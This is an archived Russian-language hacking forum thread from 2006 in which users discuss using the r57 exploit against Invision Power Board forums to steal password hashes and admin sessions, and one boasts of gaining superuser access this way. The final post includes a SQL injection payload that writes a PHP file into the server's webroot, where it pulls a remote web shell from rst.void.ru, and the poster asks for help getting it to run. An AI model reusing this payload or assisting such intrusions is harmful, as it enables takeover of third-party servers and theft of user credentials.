ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.07.2006, 21:09
|
|
Познающий
Регистрация: 01.07.2006
Сообщений: 56
Провел на форуме:
107723
Репутация:
11
|
|
- - -
Последний раз редактировалось Vilen; 01.12.2008 в 23:59..
|
|
|
17.07.2006, 21:43
|
|
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678
Репутация:
31
|
|
Вполне возможно что твой аккаунт забанили, насколько я знаю - эксп. RST оставляет сообщение, благодаря которому и существует возможность sql inj. Попробуй создать другой аккаунт.
P.S. и действовать быстро.
|
|
|
|
17.07.2006, 23:32
|
|
Познающий
Регистрация: 01.07.2006
Сообщений: 56
Провел на форуме:
107723
Репутация:
11
|
|
- - -
Последний раз редактировалось Vilen; 01.12.2008 в 23:54..
|
|
|
|
18.07.2006, 00:33
|
|
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669
Репутация:
1198
|
|
Exploit для IPB работает нормально, я так уже стал сеперюзером на форуме
|
|
|
|
18.07.2006, 07:41
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
сразу извиняюсь, я ipb не очень знаком 
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят? |
|
|
|
18.07.2006, 07:48
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
|
|
|
|
18.07.2006, 22:55
|
|
Познающий
Регистрация: 14.07.2006
Сообщений: 85
Провел на форуме:
72678
Репутация:
31
|
|
сразу извиняюсь, я ipb не очень знаком
как я понял converge_pass_hash это хеш паса с солью,converge_pass_salt сама соль. А что такое member_login_key,legacy_password и чем их едят?
Советую открыть исходник, имхо.
|
|
|
|
19.07.2006, 05:26
|
|
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266
Репутация:
366
|
|
Советую открыть исходник, имхо.
Исходник чего?форума? так как в exploite происходит только извлечение этого поля из бд.
А это кажется самый первый пасс юзера, не солёный. Но тоже в мд5.
тогда я непонимаю логику создателей форума, для чего такое надо.
Maybe admin session not exist. Please try later.
в какой момент создается его сессия, когда он появляется на форуме? И только тогда можно получить его сессию?
|
|
|
|
19.07.2006, 12:23
|
|
Постоянный
Регистрация: 12.07.2006
Сообщений: 327
Провел на форуме:
1654818
Репутация:
117
|
|
По поводу сплойта
кто знает как выглядит Client_ip в хттп запросе?
|
|
|
|
28.07.2006, 06:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Хай всем!
Хочу залить шелл через IPB 2.1.5
Юзаю http://rst.void.ru/download/r57ipb216gui.txt хэш ворует, ссесию тоже, а вот нового админа не создаёт! И скоко я не смотрел сорс, ничё не понимаю! Пытался и руками куда-то в сплоит дописать как последний ламер
Код:
UNION INSERT INTO ibf_faq (id, title, text, description) VALUES(\'98\', \'shell\', \'<? require \\\"http://rst.void.ru/download/r57shell.txt\\\" ?>\', \'To hack this server\'); SELECT text INTO OUTFILE \'C:/AppServ/www/db.php\' FROM ibf_faq where id = \\\"98\\\";
Но он не создаёт такого файла (В C:/AppServ/www/ уверен, админ оставил phpinfo.php  )
Кто поможет сакс хакеру залить шелл? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
